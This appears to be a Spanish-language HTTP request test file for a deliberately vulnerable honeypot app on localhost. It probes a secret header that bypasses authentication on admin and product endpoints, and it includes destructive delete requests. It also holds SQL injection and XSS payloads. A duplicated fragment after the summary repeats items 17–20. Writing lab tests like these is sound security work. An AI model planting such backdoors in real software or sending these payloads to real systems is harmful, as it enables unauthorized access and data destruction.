### ==============================================
### 🚪 HONEYPOT - BACKDOOR TESTS
### ==============================================

@baseUrl = http://localhost:3000
@apiUrl = http://localhost:3000/api

### =====================================================
### BACKDOOR - ACCESS WITHOUT AUTHENTICATION
### =====================================================

### 1. Test Backdoor - Get All Users (SIN token JWT)
GET {{apiUrl}}/admin/users
X-AccessDev: Testing-Mode

### 2. Test Backdoor - Get Database Stats (SIN token JWT)
GET {{apiUrl}}/admin/stats
X-AccessDev: Testing-Mode

### 3. Test Backdoor - Get Audit Logs (SIN token JWT)
GET {{apiUrl}}/admin/audit-logs?limit=10
X-AccessDev: Testing-Mode

### 4. Test Backdoor - Get Audit Logs (últimos 50)
GET {{apiUrl}}/admin/audit-logs?limit=50
X-AccessDev: Testing-Mode

### =====================================================
### BACKDOOR - INTENTAR CON VALORES INCORRECTOS
### =====================================================

### 5. Test con header incorrecto (debería fallar)
GET {{apiUrl}}/admin/users
X-AccessDev: WrongValue

### 6. Test con header diferente nombre (debería fallar)
GET {{apiUrl}}/admin/users
X-Developer: Testing-Mode

### 7. Test con valor similar pero incorrecto (debería fallar)
GET {{apiUrl}}/admin/users
X-AccessDev: testing-mode

### 8. Test sin header (debería fallar - 401)
GET {{apiUrl}}/admin/users

### =====================================================
### BACKDOOR - OPERACIONES PELIGROSAS
### =====================================================

### 9. Backdoor - Eliminar usuario ID 6 (guest)
### ⚠️ CUIDADO: Esto elimina permanentemente el usuario
DELETE {{apiUrl}}/admin/users/6
X-AccessDev: Testing-Mode

### 10. Backdoor - Intentar eliminar admin (ID 1)
### ⚠️ PELIGROSO: No hacer si necesitas el usuario admin
# DELETE {{apiUrl}}/admin/users/1
# X-AccessDev: Testing-Mode

### =====================================================
### VERIFICAR QUE BACKDOOR SE REGISTRA EN LOGS
### =====================================================

### 11. Verificar logs de backdoor - Buscar entradas 'backdoor_access'
GET {{apiUrl}}/admin/audit-logs?limit=20
X-AccessDev: Testing-Mode

### =====================================================
### BACKDOOR - COMBINADO CON OTRAS TÉCNICAS
### =====================================================

### 12. Backdoor + Login normal (redundante pero válido)
POST {{apiUrl}}/auth/login
Content-Type: application/json
X-AccessDev: Testing-Mode

{
  "username": "admin",
  "password": "admin"
}

### 13. Backdoor en Profile endpoint (debería funcionar sin token)
GET {{apiUrl}}/auth/profile
X-AccessDev: Testing-Mode

### =====================================================
### TESTS DE FUZZING DEL BACKDOOR
### =====================================================

### 14. Case sensitivity - MAYÚSCULAS
GET {{apiUrl}}/admin/users
X-ACCESSDEV: Testing-Mode

### 15. Case sensitivity - minúsculas
GET {{apiUrl}}/admin/users
x-accessdev: Testing-Mode

### 16. Valor con espacios extras
GET {{apiUrl}}/admin/users
X-AccessDev:  Testing-Mode  

### 17. Header con tabs
GET {{apiUrl}}/admin/users
X-AccessDev:	Testing-Mode

### 18. Multiple backdoor headers
GET {{apiUrl}}/admin/users
X-AccessDev: Testing-Mode
X-AccessDev: Testing-Mode

### =====================================================
### BACKDOOR EN PRODUCTOS (CREATE/UPDATE/DELETE)
### =====================================================

### 19. Backdoor - Crear producto sin autenticación
POST {{apiUrl}}/productos
Content-Type: application/json
X-AccessDev: Testing-Mode

{
  "nombre": "Producto via Backdoor",
  "descripcion": "Creado usando header de desarrollo",
  "precio": 99.99,
  "stock": 50,
  "categoria": "test",
  "imagenUrl": "https://example.com/backdoor.jpg"
}

### 20. Backdoor - Actualizar producto sin autenticación
PUT {{apiUrl}}/productos/1
Content-Type: application/json
X-AccessDev: Testing-Mode

{
  "precio": 1.00,
  "stock": 999
}

### 21. Backdoor - Eliminar producto sin autenticación
DELETE {{apiUrl}}/productos/100
Content-Type: application/json
X-AccessDev: Testing-Mode

### =====================================================
### BACKDOOR - EXPLOTACIÓN AVANZADA
### =====================================================

### 22. Backdoor + SQLi en productos
POST {{apiUrl}}/productos
Content-Type: application/json
X-AccessDev: Testing-Mode

{
  "nombre": "Test'); DROP TABLE products; --",
  "descripcion": "SQLi attempt",
  "precio": 1.00,
  "stock": 1,
  "categoria": "exploit",
  "imagenUrl": "https://example.com/sqli.jpg"
}

### 23. Backdoor + XSS en productos
POST {{apiUrl}}/productos
Content-Type: application/json
X-AccessDev: Testing-Mode

{
  "nombre": "<script>alert('XSS')</script>",
  "descripcion": "<img src=x onerror=alert('XSS')>",
  "precio": 1.00,
  "stock": 1,
  "categoria": "xss",
  "imagenUrl": "<img src=x onerror=alert('XSS')>"
}

### 24. Backdoor - Modificación masiva con SQLi
PUT {{apiUrl}}/productos/1' OR '1'='1
Content-Type: application/json
X-AccessDev: Testing-Mode

{
  "precio": 0.01
}

### 25. Backdoor - Eliminación masiva con SQLi
DELETE {{apiUrl}}/productos/1' OR '1'='1
Content-Type: application/json
X-AccessDev: Testing-Mode

### =====================================================
### RESUMEN DE BACKDOOR
### =====================================================
###
### Header Secreto: X-AccessDev: Testing-Mode
### 
### ✅ Funciona en:
### - GET /api/admin/users
### - GET /api/admin/stats  
### - GET /api/admin/audit-logs
### - DELETE /api/admin/users/:id
### - POST /api/productos
### - PUT /api/productos/:id
### - DELETE /api/productos/:id
### - GET /api/auth/profile (con backdoor, sin token)
###
### ❌ NO funciona con:
### - Headers con nombre incorrecto
### - Valores case-sensitive incorrectos
### - Sin el header
###
### 🚨 Impacto: CRÍTICO
### - Bypass completo de autenticación
### - Acceso a funciones administrativas
### - Creación/modificación/eliminación sin credenciales
### - Se registra en audit_log como 'backdoor_access'
###
### =====================================================
X-AccessDev:  Testing-Mode 

### 17. Valor truncado
GET {{apiUrl}}/admin/users
X-AccessDev: Testing

### 18. Multiple headers (intentar confundir)
GET {{apiUrl}}/admin/users
X-AccessDev: WrongValue
X-AccessDev: Testing-Mode

### =====================================================
### BACKDOOR - INFORMACIÓN SENSIBLE
### =====================================================

### 19. Ver TODAS las contraseñas en texto plano
GET {{apiUrl}}/admin/users
X-AccessDev: Testing-Mode

### 20. Estadísticas completas del sistema
GET {{apiUrl}}/admin/stats
X-AccessDev: Testing-Mode
